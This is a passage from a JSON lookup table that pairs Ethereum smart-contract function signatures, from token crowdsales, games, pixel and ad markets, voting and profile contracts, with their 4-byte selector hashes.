"WELFARE_HANDOUT()": "0x07cfa11f", "approveAdvertiserCharges()": "0x609ba988", "weiPerUSD()": "0xf62de0c3", "THIRD_TIER_RATE()": "0x2e7ceb0f", "getGuardianNum()": "0x82147bb4", "futureOwner()": "0xb9e9d1aa", "GRAPE_SECS_TO_GROW_VINE()": "0x33d97457", "codename()": "0x31e63199", "tokenForAdvisor()": "0xbeebeff7", "secondStartTime()": "0xad2a39d6", "totalTeamSupply()": "0x170594c6", "t_3rd_StageEnd()": "0xdd21f395", "crowdsaleAmountLeft()": "0x64eaa454", "referral_fee()": "0xc9fbdc36", "firstThawDate()": "0x4e31aea3", "ndc()": "0x5dcd967d", "minBuyingRequestInterval()": "0x27589224", "airdropBy0Eth()": "0xaab8f6e0", "feeIndex()": "0x29864547", "candidates()": "0x6f0470aa", "sumPreICO2()": "0xaf047106", "prizeFundFactor()": "0xecda5fb6", "STAGE_3_START()": "0xb688578c", "soldBeforeUnsoldAllocation()": "0xbba9cfe1", "bonusDate()": "0xb521c106", "Withdraw_2()": "0x13748a40", "publicTokensAvailable()": "0x355d59aa", "preIcoIsRunning()": "0xf4aa956c", "moving()": "0xcb11526d", "withdrawalProfit()": "0x2ebec916", "weiPerABIO()": "0x6d224b7b", "nextMineId()": "0x9b550e55", "averageTimestamp()": "0xd8e97a56", "distributeWinnings()": "0x7d2026cd", "bltOwnedAcc()": "0x7c67fdf5", "monsterStrength()": "0xd8e74ed7", "voteToClose()": "0x2277466b", "ownerFee()": "0xd5b2a01a", "cliffTeamTokensRelease()": "0xda1ff555", "docHash()": "0x3d6df0d5", "MAX_ICO_SUPPLY()": "0xa4bbded4", "exy()": "0xf9d38868", "EtherPluscoin()": "0xc353dbb1", "tokensMintedDuringICO()": "0xd161b56a", "getNumberOfKnownPropertyAddresses()": "0xa3a1cd6d", "authorizedLogicContractAddress()": "0x02884909", "kncPerETHRate()": "0x820b9f1e", "nextAvailableLevel()": "0x6ecd1129", "TIER3_PRICE()": "0x3e7614cd", "winningTeamName()": "0x19e13c93", "rewardPoolSupply()": "0x397b3378", "tokensAllocatedTotal()": "0x11e48cdf", "window3TokenCreationCap()": "0x3b86758a", "prizeClaimed()": "0x9042bbf3", "killOnUnsupportedFork()": "0xf81a1860", "loveEvent()": "0xbbd3b27c", "finalizedTime()": "0xfe67a189", "getBrickIds()": "0xb23a31e4", "fundariaTokenAddress()": "0x386381db", "kyberContract()": "0x2aed1390", "phase2WeiRaised()": "0x55f39677", "ICOFinished()": "0x54b6a520", "isPresaleClosed()": "0xa8967557", "totalUETsSold()": "0xc26b41e7", "getCountdowns()": "0xfc49926f", "EthernautsPreSale()": "0xdec6bc91", "setadmin()": "0xdcaeea15", "POCG()": "0x0969a71f", "ChristCoin()": "0x4458ddca", "FutureCoin()": "0xfa923d10", "getMyAvailableWine()": "0xae3c697c", "getMyTransferredWine()": "0x34231e72", "calculateWineBuySimple(uint256)": "0xfd4bd17b", "calculateWineBuy(uint256,uint256)": "0x88aebe00", "calculateWineSellSimple(uint256)": "0xf9974d9d", "calculateWineSell(uint256,uint256)": "0xa37dec33", "buyWine()": "0x6b9808a1", "sellWine(uint256)": "0xcd45376c", "consumeWine(uint256)": "0xa334edf6", "transferWineFromVineyardCellar()": "0xc9c92c12", "WineMarket(address)": "0xca34e1d6", "IPAC()": "0xcd576dd0", "setUserMessage(string)": "0x7e331a99", "setPixelPrice(uint16,uint16,uint256)": "0xbd7162b6", "setPixelColor(uint16,uint16,uint24)": "0x2b3fbbbb", "transferPixel(uint16,uint16,address)": "0x0ff188c7", "buyPixel(uint16,uint16,uint24)": "0x675d43cf", "checkPendingWithdrawal()": "0xffa08cb7", "getUserTotalSales(address)": "0xb5b13462", "getUserMessage(address)": "0xd8be30fc", "getPixelPrice(uint16,uint16)": "0xf186bb79", "getPixelOwner(uint16,uint16)": "0x8d63cfa7", "getPixelColor(uint16,uint16)": "0xd0f5f4cd", "setDefaultPrice(uint256)": "0x6d3c7ec5", "setFeeRatio(uint256)": "0x19f4ff2f", "getKey(uint16,uint16)": "0xb37610ad", "Grid(uint16,uint256,uint256,uint256)": "0xa38deeab", "GMCToken()": "0x26bfcde0", "CustomToken(string,string)": "0xd545ee2d", "GamePlayerCoin()": "0x94a66da2", "DexAlpha()": "0x61dd8d13", "drop(address[],uint256)": "0x3974874b", "incNonce()": "0x911475cc", "ETH888CrowdsaleS1(address)": "0x1e9f3c24", "transferableTokens(address,uint256)": "0x7fdb5031", "MEC()": "0x374b94c8", "getAdPrice(uint256)": "0xdf190048", "getAdOwner(uint256)": "0x55843fda", "getAdUrl(uint256)": "0xaa617f25", "getAdText(uint256)": "0xe63fb7d2", "buyAd(uint256,string,string)": "0x4f26ef80", "AdPotato()": "0xd9135493", "batchOrderTrade(uint8[2][],bytes32[4][],uint256[7][],address[6][])": "0x869c63c1", "trade(uint8[2],bytes32[4],uint256[7],address[6])": "0x7cc1303a", "depositToken(address,uint256,address)": "0x9d575582", "setFees(uint256,uint256,uint256)": "0xcec10c11", "Exchange(address,uint256,uint256,uint256,address,address)": "0xd3a60bd5", "isTokenInList(address)": "0x95533f17", "getReferrals(address)": "0x41a0894d", "getAffiliate(address)": "0xbc019eed", "getAffiliateCount()": "0x31511e61", "assignReferral(address,address)": "0x1294d4db", "_updateRegionOwner(address[16],uint256,address)": "0x68be8007", "_processUpdateFee(address[16],uint256)": "0xaade1323", "updateRegionPixelPrice(address[16],uint256,uint256)": "0x42f88548", "updateRegion(address[16],uint256,uint256,uint256[],bool,bool,uint8[128],bool,address)": "0x523f110e", "setupRegion(address[16],uint256,uint256,uint256[],bool,uint8[128])": "0x0bad4481", "deleteRegion(address[16],uint256)": "0x28339320", "createRegion(address[16],address,uint256,uint256,uint256,uint256)": "0xf7a919be", "imageUploadComplete(address[16],uint256)": "0xd5779b7f", "setImageData(address[16],uint256,uint16,uint256[])": "0xbd88f603", "setImageOwner(address[16],uint256,address)": "0x9767fff7", "setNextImagePart(address[16],uint256,uint16,uint16,uint16,uint256[])": "0x9c161d1a", "checkImageInput(address[16],uint256,uint256,uint256[],bool,bool)": "0x33840712", "BdpImageStorage(bytes8)": "0x3602627d", "imageUploadComplete(uint256)": "0x624c3dbd", "setImageBlurredAt(uint256,uint256)": "0x55061ccc", "getImageBlurredAt(uint256)": "0x3016a439", "setImageDescriptor(uint256,uint16)": "0x49b88919", "getImageDescriptor(uint256)": "0xb206eb42", "setImageHeight(uint256,uint16)": "0x997f0198", "getImageHeight(uint256)": "0x99cc00d1", "setImageWidth(uint256,uint16)": "0xdf5483ad", "getImageWidth(uint256)": "0xb18d0c80", "setImagePartsCount(uint256,uint16)": "0x143e6209", "getImagePartsCount(uint256)": "0xb3b5fc76", "setImageDataLength(uint256,uint16,uint16)": "0x865c79b2", "getImageDataLength(uint256,uint16)": "0x8dd05b56", "setImageData(uint256,uint16,uint256[])": "0xbc921d54", "getImageData(uint256,uint16)": "0xced78ed1", "setImageCurrentRegionId(uint256,uint256)": "0xc609ab26", "getImageCurrentRegionId(uint256)": "0x82fb63c7", "setImageRegionId(uint256,uint256)": "0xc5a0a555", "getImageRegionId(uint256)": "0xd22b9177", "setImageOwner(uint256,address)": "0x24fabb87", "getImageOwner(uint256)": "0xa9b11426", "deleteImage(uint256)": "0x861d7daf", "imageExists(uint256)": "0xf0366c45", "createImage(address,uint256,uint16,uint16,uint16,uint16)": "0xc64f28c8", "getNextImageId()": "0xeaddf7b9", "getLastImageId()": "0x7255f7ad", "CarBonCash()": "0xf23008ca", "NeodiumNetwork()": "0x09d0bb66", "Rollercoaster()": "0xe690d9bf", "removeEA(uint32)": "0x4e3df857", "signEA(uint32)": "0xc1e7310a", "addEA(string,string,string,uint32,address,address,string)": "0x699a195d", "setPlAAdress(address)": "0x5ff1a9c0", "EmpAgreements(address)": "0xeab65fb2", "serServerStatus(string,uint256)": "0x9018c431", "setServerFee(string,uint256)": "0xfb6139b5", "removeServer()": "0xb86e0657", "publish(bytes,string)": "0x890a7ef7", "setMembershipContract(address)": "0xd38fe43f", "removeEmbassy(address)": "0x6123c63f", "removeImmigration(address)": "0xe745656b", "addEmbassy(address)": "0x4d486406", "addImmigration(address)": "0xc28196b1", "addCountry(address,uint256)": "0x8c614502", "setEmbassyCtrl(address)": "0xf5318389", "setImmigrationCtrl(address)": "0x5bdc3c53", "Nation(address,address)": "0xccc55189", "executeContract(uint128,uint128)": "0x2dfaf204", "getReward()": "0x3d18b912", "executeContract()": "0xaedb1c8f", "agent(address)": "0x92e423b5", "deleteEntireGlofile()": "0xf671f5b3", "copyEntireGlofile(address)": "0x97cd1829", "getUri(address,uint256)": "0xe7f034c1", "getUriCount(address)": "0xa1c80cea", "deleteAllUris()": "0xa7741827", "deleteUri(uint256)": "0x246eb968", "setUri(uint256,string)": "0x782f08ae", "getChild(address,uint256)": "0xe62420d9", "getChildCount(address)": "0x9d4c8eed", "deleteAllChildren()": "0xf536c61a", "deleteChild(uint256)": "0x227e26c4", "setChild(uint256,string)": "0xe4d8dead", "getParent(address,uint256)": "0x9f7b0fc8", "getParentCount(address)": "0x01067543", "deleteAllParents()": "0x2a6f39ed", "deleteParent(uint256)": "0x309b7ed3", "setParent(uint256,string)": "0x66f84d30", "getTopic(address,uint256)": "0x4072eee2", "getTopicCount(address)": "0xf2b05c15", "deleteAllTopics()": "0x168a80d3", "deleteTopic(uint256)": "0x3c673c19", "setTopic(uint256,string)": "0x619419d8", "getBackgroundImage(address,uint256)": "0x2e532ba2", "getBackgroundImageCount(address)": "0x9076a38a", "deleteAllBackgroundImages()": "0x6d50a2b5", "deleteBackgroundImage(uint256)": "0x053b8d2f", "setBackgroundImage(uint256,bytes)": "0x98ab1c72", "getCoverImage(address,uint256)": "0x0e21f784", "getCoverImageCount(address)": "0xaa08c9e6", "deleteAllCoverImages()": "0x08fd866c", "deleteCoverImage(uint256)": "0x0a82f06b", "setCoverImage(uint256,bytes)": "0x92bb3e6a", "getAvatar(address,uint256)": "0x45895620", "getAvatarCount(address)": "0x3e98b93a", "deleteAllAvatars()": "0xcbae1467", "deleteAvatar(uint256)": "0xcf47810c", "setAvatar(uint256,bytes)": "0x0b5f5ef1", "getBio(address,bytes3)": "0xf8615d24", "getBioLanguages(address)": "0xf8806544", "deleteAllBioTranslations()": "0xfd46544a", "deleteBio(bytes3)": "0xd8879fdc", "setBio(bytes3,bytes)": "0xe786140e", "getBasicInfo(address)": "0xd401defe", "setLanguages(bytes3[])": "0xef1367dd", "setBackgroundColors(bytes3[])": "0xfeed58ff", "setForegroundColors(bytes3[])": "0x6252d651", "setLocation(string)": "0x827bfbdf", "setFullName(string)": "0x5f4f35d5", "setDontIndex(bool)": "0x075d7bb3", "RFQ(string,uint256,string)": "0xb6f46d4c", "DAO(address,address,bytes32,bytes32,address,address,address)": "0xda1b95a6", "TestToken(uint256,string,uint8,string)": "0x72ea4b3d", "_mul(uint256,uint256)": "0x4bad3327", "withdrawAll(address)": "0xfa09e630", "withdrawAllEth(address)": "0xd46d79bb", "withdrawEth(address,uint256)": "0x1b9a91a4", "withdrawAllTokens(address)": "0xa878aee6", "_balanceOf(address,address)": "0xc4818cdc", "_emitActiveChanged(bool)": "0x10ed5dfe", "_emitPricesUpdated(uint256,uint256)": "0x59485790", "_error(uint256)": "0xdaf7f103", "emitActiveChanged(bool)": "0x850a4621", "emitPricesUpdated(uint256,uint256)": "0x975be231", "emitError(uint256)": "0xdf26ca08", "Whitelist()": "0x9ebf6d92", "checkAndCallSafeTransfer(address,address,uint256,bytes)": "0x323efacd", "clearApproval(address,uint256)": "0x6de53001", "isApprovedOrOwner(address,uint256)": "0x430c2081", "safeTransferFrom(address,address,uint256,bytes)": "0xb88d4fde", "safeTransferFrom(address,address,uint256)": "0x42842e0e", "isApprovedForAll(address,address)": "0xe985e9c5", "setApprovalForAll(address,bool)": "0xa22cb465", "getApproved(uint256)": "0x081812fc", "exists(uint256)": "0x4f558e79", "Check()": "0x2de4ca59", "Play(uint256,uint256)": "0x2e6e190e", "CollectEarning()": "0x495df195", "DisburseEarnings()": "0x811e4f71", "_regName(bytes32)": "0xa006b0e2", "createDelegation(address,uint256)": "0xce52c4ef", "SVDelegation()": "0x2ef70523", "_getLogTokenContract(uint256)": "0xdbf1ede3", "_rawGetTokenDelegation(address,address)": "0x5fc31aeb", "_rawGetGlobalDelegation(address)": "0xefc63bd3", "getHistoricalDelegation(uint64)": "0x30381f5f", "findPossibleDelegatorsOf(address)": "0xd8e6b249", "resolveDelegation(address,address)": "0x61efc7db", "getDelegationID(address,address)": "0xb2b28679", "setTokenDelegation(address,address)": "0xdf6e7a5f", "setGlobalDelegation(address)": "0xb1194bc4", "createDelegation(address,uint64,address)": "0xef2d5786", "SVDelegationV0101(address)": "0x1605bc07", "setDeprecated()": "0x98203e6b", "setEndTime(uint64)": "0xe945c391", "getEncSeckey()": "0x3dc286ae", "revealSeckey(bytes32)": "0xcbc265ac", "addBallotAndVoterNoPk(bytes32)": "0xd33b79d9", "addBallotAndVoterWithPk(bytes32,bytes32)": "0x158e7986", "submitBallotNoPk(bytes32)": "0xdea7b768", "submitBallotWithPk(bytes32,bytes32)": "0xbc19bcbf", "SVLightBallotBox(bytes32,uint64[2],bool[2])": "0x9a5666b8", "max(uint64,uint64)": "0x7d7a31b6", "deployBallot(bytes32,bytes32,bytes32,uint64[2],bool[2])": "0x62981b18", "addBallot(bytes32,bytes32,address)": "0xa1a1efe7", "_commitBallot(bytes32,bytes32,bytes32,address,uint64)": "0x245e70f0", "getNthBallot(bytes32,uint256)": "0x88257016", "nBallots(bytes32)": "0xcf2317d5", "setAdmin(bytes32,address)": "0xee4024db", "getDemocInfo(bytes32)": "0x27f4b056", "initDemoc(string)": "0xf39d359b", "setFeeFor(address,uint128[2])": "0x5d7e7219", "setWhitelistBallot(address,bool)": "0x1badfbae", "setWhitelistDemoc(address,bool)": "0xb7b4fe13", "setPaymentEnabled(bool)": "0x4d1ff181", "setEth(uint128[2])": "0xb93dc802", "setPayTo(address)": "0x61b9739a", "nDemocs()": "0x5db38c63", "SVLightIndex()": "0x26faf1e9", "getPaymentParams(uint8)": "0x4327979a", "_setSubnodeOwner(bytes32,address)": "0xa79ca634", "registerName(string,address)": "0x7b59af16", "chOwner(address,bool)": "0x4478fbb2", "remAdmin(address)": "0x11c60418", "undoUpgrade()": "0xd6a6a520", "deprecateAndUpgrade(address)": "0xe7b2d7e5", "doUpgradeInternal(address)": "0x4e7a540b", "getUpgradePointer()": "0xa76f3543", "doLockdown()": "0x105689a0", "hasPermissions(address)": "0x1ffa27f9", "upgradeMe(address)": "0x5341903b", "upgradePermissionedSC(address,address)": "0xb2461b15", "setPermissions(address,bool)": "0x6165234c", "initReverseENS(address)": "0xa2a9d1ef", "disableAdminForever()": "0xe0fd59bf", "incAdminEpoch()": "0x4681067d", "_setAdmin(address,bool)": "0x4bca5cc0", "upgradeMeAdmin(address)": "0x81bd66fe", "getAdminLog(uint256)": "0x21fb9869", "getAdminLogN()": "0x407a5c92", "getPayTo()": "0xf1efb76a", "payoutAll()": "0x4da2317f", "_setPayTo(address)": "0xbd550824", "_getPayTo()": "0xfc8f3a94", "doSafeSendWData(address,bytes,uint256)": "0x6a5d7206", "doSafeSend(address,uint256)": "0xc345c54b", "generateToken(string,uint256)": "0x3894e516", "submitOrder(uint8,uint8,uint64,uint64,uint16,uint16,uint16,uint16,uint16,uint16,uint256)": "0x367ba52c", "submitMatch(bytes32,bytes32)": "0x2a337d30", "allowTransfer(address,address,address,uint256,bytes)": "0xb7db7f0f", "findOldest()": "0xfbe6529f", "ids(uint256)": "0xfac333ac", "setMaxCharacters(uint16)": "0xf5015000", "numCharacters()": "0xf1be42f1", "setPercentageToKill(uint8)": "0xeb8fb32c", "noKing()": "0xdc9bb7db", "getFees()": "0xdb8d55f1", "setFee(uint8)": "0xcb122a09", "numOfBalloonsTypes()": "0xc8f490c8", "lastEruptionTimestamp()": "0xc10435cc", "numDragonTypes()": "0xbc447a6d", "getNumKnights()": "0xb32dbcd8", "setFightFactor(uint8)": "0xb1b79120", "cooldown(uint32)": "0xb066ef3c", "eruptionThreshold()": "0xafb7e495", "setProtectionPrice(uint256)": "0xacd782b1", "maxCharacters()": "0x8882ddc9", "getNumDragons()": "0x851ad4d6", "addCharacters(uint8)": "0x797e2aec", "setPrices(uint16[])": "0x7825396b", "fight(uint32,uint16)": "0x773e1e84", "protection(uint32)": "0x72ad21c7", "nextId()": "0x61b8ce8c", "teleportPrice()": "0x6121e522", "get10Characters(uint16)": "0x603709e3", "values(uint256)": "0x5e383d21", "setEruptionThreshold(uint256)": "0x50c88103", "getCharacterIndex(uint32)": "0x4f255b80", "fightFactor()": "0x4ad6e648", "totalCollectedWei()": "0xc51d16b6", "PAYOUT_PCT()": "0x6efa6a67", "preICOspecial()": "0x5d285eca", "agentAddr_()": "0xabcccdb1", "TOKENS_SOLD()": "0x0c8f167e", "curr_number()": "0xea782500", "successfulTime()": "0xfcfdaa52", "totalPotHomeTeam()": "0x43e72c5a", "icoTotalCollected()": "0xa2d435d4", "vestedAdvisors()": "0xcd69859e", "SWLPerEther()": "0x4b61cf17", "getkEthPhiRate()": "0x6a470988", "cancelApproveFee()": "0x4a87b419", "PokerPayout()": "0xf2d439d8", "SharePrice()": "0x48c7a0bf", "bonusMin()": "0x1b87d58a", "ChangeTransferStatus()": "0xc6e0dc6e", "buy_planet()": "0x37df4828", "currentStep()": "0x5bc34f71", "InfinixSupply()": "0x20b3c9c9", "hasSellerGuarantee()": "0x1ebf1f5b", "ownerBuyCut()": "0x1a9e3e18", "mintStepPrice()": "0xfa462e95", "mainCoinSentToEther()": "0xd726f7c7", "digits()": "0x9e20437c", "tokensRemainingPreIco()": "0xb27ea08d", "max_fundingGoal()": "0x6f152670", "bugDiscovered()": "0x031f74d4", "targetDiscountValue8()": "0xfd2c3abb", "fundReservCompany()": "0x7209036a", "seed_coins_vault2()": "0xac1cd994", "releaseTime3()": "0x356f056f", "minableSupply()": "0x0c62b816", "stakeStartTime()": "0x7419f190", "currentTotalExcess()": "0xd2ffca2d", "mintStart4()": "0xc5160187", "Funding_Setting_funding_time_start()": "0xaffd0dd4", "tradeContract()": "0xffa640d8", "gameStopped()": "0x0430e405", "thresholdEtherLimitForSeedRound()": "0xe308700f", "TIER2_PRICE()": "0x6aff1a64", "bids_sorted_count()": "0x6290a009", "totalICOAmount()": "0xf3147b00", "CROWD_WAVE1_BONUS()": "0x32e26d24", "getTotalBidded()": "0x288dd331", "purchaseAuthorizer()": "0x44c9e83d", "poolWithdraw()": "0x91051e06", "EthDev()": "0xa33d5d9d", "ratePreIco()": "0xf2ecebea", "clockmint()": "0xa34ad6b6", "ICO_PRE_SALE()": "0x849e961a", "thirdStage()": "0x68203417", "totalAmountOfEarlyPurchasesWithBonus()": "0xf85a3dea", "bonusDeadlineDefault()": "0xb1112507", "_authority()": "0xc2205ee1", "whitelistControl()": "0x41f1d4dd", "totalLockPrincipal()": "0x6ed34394", "Fees()": "0x3aaa36e6", "MVM24PeriodsCapUSD()": "0x5d91e27b", "TOTAL_POOL_COMMISSION()": "0x26735c06", "updatePriceFreq()": "0x3a5f32cd", "LongTermProjectTokens()": "0xebbb76c8", "totalRestrictedAssignments()": "0x69683080", "BONUS_250_500()": "0xfacd0934", "GOLD_AMOUNT_XPER()": "0x2241a733", "MAX_PRICE()": "0x01c11d96", "tokensDataProviders()": "0xbaa2edaf", "notLessThan()": "0x2a862f1a", "protoCount()": "0xd7643e18", "currentWave()": "0x86b46694", "maxTimeIntervalHB()": "0xc77547f7", "crowdsaleTarget()": "0x13643605", "baseRateInCents()": "0x01491f09", "minTrade()": "0xb2427755", "bullToken()": "0xc8d86e35", "_supply()": "0x15945790", "CIRCULATING_BASE()": "0x07d3d941", "additionalPresaleInvestors()": "0xa984cec2", "totalTeamFundMinted()": "0x89bdb217", "egcToken()": "0x4376890e", "totalSubscription()": "0xec845dd8", "mainSaleFirstEndDate()": "0x60d60dad", "priceForMateAdvertisement()": "0x13d1bdfb", "registerDuration()": "0x75a5b1ab", "payee()": "0xae90b213", "totalContributedETH()": "0x3d5d0720", "PARSEC_CREDITS_MINIMAL_AMOUNT()": "0x89852db2", "priceOfSmartContract()": "0xa315cda0", "vestingStartUnixTimestamp()": "0xf60b9406", "PUBLIC_SALE_TOKEN_CAP()": "0xb8eb993d", "infoUrl()": "0x3167e9d2", "tokenRegistryAddress()": "0x5be2aca0", "friendsFingersWallet()": "0xc0e789cc", "USER_TIMEOUT()": "0xad889f03", "CUTOFF_PRESALE_TWO()": "0xdfe3a52b", "assignedAmountToCornerstoneInvestment()": "0x4d0633f6", "oldPriceChangeBlock()": "0x0a639726", "periodITO_startTime()": "0x4941d296", "minWeightPunish()": "0xaec30dc1", "maxPurchaseOnce()": "0x6cb7223c", "setEventResult(string,uint64,uint8)": "0x0e420f42", "createEvent(string,uint256,uint8,uint256,uint256,uint64)": "0x222d777a", "Kontlo()": "0x2356f46a", "initAccount(address,uint256)": "0x0eae2f86", "transferByCoinOwner(address,address,uint256)": "0xb4942ad1", "lockToken(bool)": "0xf1f0b290", "setIncrEth(uint256)": "0xdc14af38", "setCurrentSupply(uint256)": "0xdc547301", "GCPToken()": "0xc180e1d0", "updateConfig(bytes)": "0x8cc6acce", "preCensor(bool)": "0x8a7f800c", "review(string,bool)": "0x27b55475", "AnmiToken()": "0xccd8e2cf", "setSaleFinish()": "0x026fcf83", "getDiscountAndSupply()": "0xe621350d", "calculateBonusToken(uint256)": "0x582f5009", "sellTokens(address,address,uint256)": "0x3eafec21", "_distributeTokenToPurchaser(address,address,uint256)": "0xfbd902f2", "_distributeFloatWalletToken(uint256)": "0xfa355d1c", "_distributeBountyToken(uint256)": "0x0e7a967a", "_distributeAdvisorsToken(uint256)": "0xc74fda29", "_distributeTeamToken(uint256)": "0xb642c768", "checkAllowedAddressFoTransfer(address,address)": "0xb58d0651", "setAllowedForTransfer(address,address)": "0x725326dc", "approveProject(address,uint256)": "0x28c8b217", "checkAllowedAddressForMinting(address,address)": "0xfb9ba033", "setDisallowedForMinting(address,address)": "0x4820059f", "setAllowedForMinting(address,address)": "0x4a2388ff", "winningOption(uint256)": "0x0dca7ed8", "createIssue(uint256,address,uint256[],address[],string)": "0x157a68df", "topOptions(uint256,uint256)": "0xaff9e954", "weightedVoteCountsOf(uint256,uint256)": "0x6e6a1dc3", "weightOf(uint256,address)": "0x8935ced5", "ballotOf(uint256,address)": "0x32ec991c", "optionDescription(uint256,uint256)": "0xea2bc862", "availableOptions(uint256)": "0xc36fff2d", "issueDescription(uint256)": "0x1e01a172", "setStatus(uint256,bool)": "0x8719e8ac", "setProduct(uint256)": "0x6fd1bdea", "RunchuToken(uint256,string,uint8,string)": "0x0133e1fa", "withdraw(uint256,uint8,bytes32,bytes32,uint256)": "0x1d6f757d", "enableLimit()": "0x696b1030", "isLimitedWalletAddress(address)": "0xa24ed4e5", "STSTEST7()": "0xf839686d", "QueenXChain()": "0x24bc4e92", "reLoadCore(uint256,uint256)": "0xfbd6fdde", "reLoadXaddr(uint256)": "0x4c38c366", "core(uint256,uint256,uint256)": "0x27f02f74", "buyCore(uint256)": "0xa60014e3", "buyXaddr()": "0xbe78e656", "getEthFundDeposit()": "0x9b8da66c", "setPhaseBonusAddress(address,address)": "0x0bece492", "getPhaseSupply(uint256)": "0x5b65da64", "setPhaseSupply(uint256,uint256)": "0x352d5cd0", "setTokenRate(uint256,uint256)": "0x38e7920a", "getMaxBuy(uint256)": "0x109e9de6", "setMaxBuy(uint256,uint256)": "0x250c95fe", "getMinBuy(uint256,uint256)": "0xcd1f63dc", "setMinBuy(uint256,uint256,uint256)": "0x936f8a40", "getPhaseSold(uint256)": "0xa4202504", "setPhaseSold(uint256,uint256)": "0x3aaa3f24", "sellSpecialTokens(address,uint256)": "0xa81afa57", "getCurrentBonus(bool)": "0x01c8c9d4", "getBonusSale(uint256,uint256)": "0x4b9081bf", "setBonusSale(uint256,uint256,uint256)": "0xc0bb20a6", "getPhaseSale(uint256,uint256)": "0x43b1938d", "setPhaseSale(uint256,uint256,uint256)": "0x6c054113", "getAccountBonus(address,address)": "0xc5dc6b55", "setAccountBonus(address,address,uint256)": "0xcbcf8ece", "getBonusAffiliate(uint256)": "0xa42ac803", "setBonusAffiliate(uint256,uint256)": "0x0e114c89", "Ecometh()": "0x9d69fdff", "numberOfVestedContracts()": "0x16dc9704", "demi(uint256,string,string)": "0x26c32ff5", "CTSCoin()": "0x224a967c", "generateUniquePets(uint8)": "0x8aadf70a", "purchaseEgg(uint64,uint16)": "0x205d6c86", "eggAvailable(uint16)": "0x99348f8e", "setEggLimit(uint16,uint16)": "0xefa726e8", "_owns(address,uint64)": "0x960bfc9b", "getGradeByQuailty(uint16)": "0x90ca9dbf", "createPet(uint256,uint16,address)": "0x99af4114", "setBreedTimeout(uint32)": "0xbe782f58", "setMixGenAddress(address,address)": "0x4aba7f96", "uniquePet(uint64)": "0x8a9d1fbf", "openEgg(uint64,uint16)": "0x5e733baa", "CutieBit()": "0x4ee0cb8a", "changeWithdrawal(address,address)": "0x35509937", "changeTrade(address,address)": "0x440235c0", "eUSD()": "0x42c65ae5", "USDTUBE()": "0x2b25303b", "eNomCoin()": "0xe8024d75", "ETpay(uint256,string,string)": "0x8ece85a4", "ERC20MIST(uint256,string,string)": "0x4d314b5a", "QBASE()": "0x0e0ac84c", "GROWCHAIN()": "0x31670619", "SCFToken()": "0x5debb827", "GreenMining()": "0xb3924a58", "Penny()": "0x701969e5", "withdrawOtherTokens(address)": "0xa1190a36", "setVicepresidenteDeMesa(bytes32,uint256,uint256,uint256,bytes32)": "0x28a1cab8", "setPresidenteDeMesa(bytes32,uint256,uint256,uint256,bytes32)": "0x9cc33024", "setPresidenteDeMesaVerify(bytes32,uint256,uint256,uint256,bytes32)": "0xb8fc7bd0", "setDelegadoDeEscuela(bytes32,bytes32,uint8,uint8)": "0xc7941a09", "setDelegadoDeEscuelaVerify(bytes32,bytes32,uint8,uint8)": "0xaa6aca58", "setDelegadoDeDistrito(bytes32,bytes32,uint8)": "0x15f2fe4f", "setDelegadoDeDistritoVerify(bytes32,bytes32,uint8)": "0xcd9d27ed", "setApoderado(bytes32,bytes32,bytes32)": "0x8c638152", "setApoderadoVerify(bytes32,bytes32,bytes32)": "0x6f6c7234", "isValidCandidate(bytes32)": "0x8c1d9f30", "getCandidateForApoderado(bytes32)": "0xa002b179", "getCandidates()": "0x06a49fce", "verifyAutoridadElectoral(bytes32)": "0x8d94053f", "getElectionInfo()": "0x86852dca", "setElectionInfo(uint256,uint256,uint256)": "0x9fda6271", "createElection(bytes32,bytes32[])": "0xc510f746", "createElectionVerify(bytes32,bytes32[])": "0x538b9618", "Election(address,address,address,address,address)": "0x49d2ca11", "DAOSecurity(address,address,bytes32,uint256,uint256,uint128)": "0xfa5919a8", "update(string)": "0x3d7403a3", "echo(string,string)": "0x37c8d21f", "finalize(bool)": "0x6c9789b0", "returnPurchase(address)": "0xad686011", "claimEth()": "0xb7cdddcb", "funded()": "0xf3a504f2", "mintExtraTokens(int256,uint256)": "0x5800827c", "forwardFunds(bool)": "0x79f68f85", "addPrivatePresaleTokens(address,uint256,uint256)": "0xa5878c65", "getRate()": "0x679aefce", "setWeiPerUSDinTGE(uint256)": "0x6274ca4b", "LifCrowdsale(uint256,uint256,uint256,uint256,uint256,uint256,address,address)": "0xe0cc4e1b", "SimpleApproveTransfer(address)": "0x1adbdfab", "getRegistry()": "0x5ab1bd53", "setRegistry(address)": "0xa91ee0dc", "setUseRegistry(bool)": "0xf2523e7a", "getUseRegistry()": "0x4af56cb0", "useDefaultRegistry()": "0x2d123aa4", "setLogger(address)": "0x5722e24a", "Loggable()": "0x5b68f3a6", "logStr(string)": "0x9adba14b", "logUint(int256,uint256)": "0xe8141f93", "logBytes(bytes32)": "0xf4a6ef99", "getLockerDetails(address,uint256)": "0x01bb7e5a", "getNumLockers(address)": "0x1534b392", "withdrawAll2()": "0xfc3087f8", "store(uint256)": "0x6057361d", "calcEnvHash(bytes32)": "0x641f83a1", "pendingReturns(address)": "0x26b387bb", "hasNoBids()": "0x82425d7c", "doSetSettings(uint64,uint64,uint256)": "0x58d80a8c", "setSettings(uint256,uint64,uint64,uint256)": "0x3c1b87f9", "reclaimOwnership()": "0xc1c8277f", "withdraw(address,address)": "0xf940e385", "construct(bytes32,string,bytes32,address,uint128,uint256,uint64,uint64,uint256)": "0x5753a6b2", "AccessControl()": "0x1f7c4bf3", "WCT(address)": "0xff28cdaf", "identified(address,address,bytes32)": "0x5c36e11c", "setIDChain(address,address)": "0xff0f27de", "Identified()": "0xd6ecff50", "finalization()": "0x78abfbeb", "RefundableCrowdsale(uint256)": "0x947846a4", "ii()": "0x6c026f59", "size()": "0x949d225d", "has(address)": "0x21887c3d", "HeritableWalletFactory()": "0x8fa9cc09", "testGetTransactionDetails(bytes)": "0x138a886e", "getTransactionDetails(bytes)": "0xe62e3c07", "testGetReceiptDetails(bytes)": "0x08de795d", "getReceiptDetails(bytes)": "0xfd6ecb7b", "getSig(bytes)": "0x229df5c6", "lock(address)": "0xf435f5a7", "unlock(bytes32,bytes,uint256[],bytes,bytes,bytes,uint256[],bytes,bytes)": "0xf7426b62", "ETCLocking(address,address)": "0x09d78e32", "isSspRegistered(address)": "0x50f503c1", "findSsp(address)": "0xd463ca18", "transferSSPRecord(address,address)": "0x7119c873", "updatePublisherFee(address,uint16)": "0x336b9f80", "unregisterSsp(address)": "0x19fd93f1", "mock_clear()": "0xb1e254c7", "mock_remove(address,address)": "0xfece5543", "mock_set(address,address,uint256,uint256)": "0x55c33624", "mock_contains(address,address)": "0xb674e749", 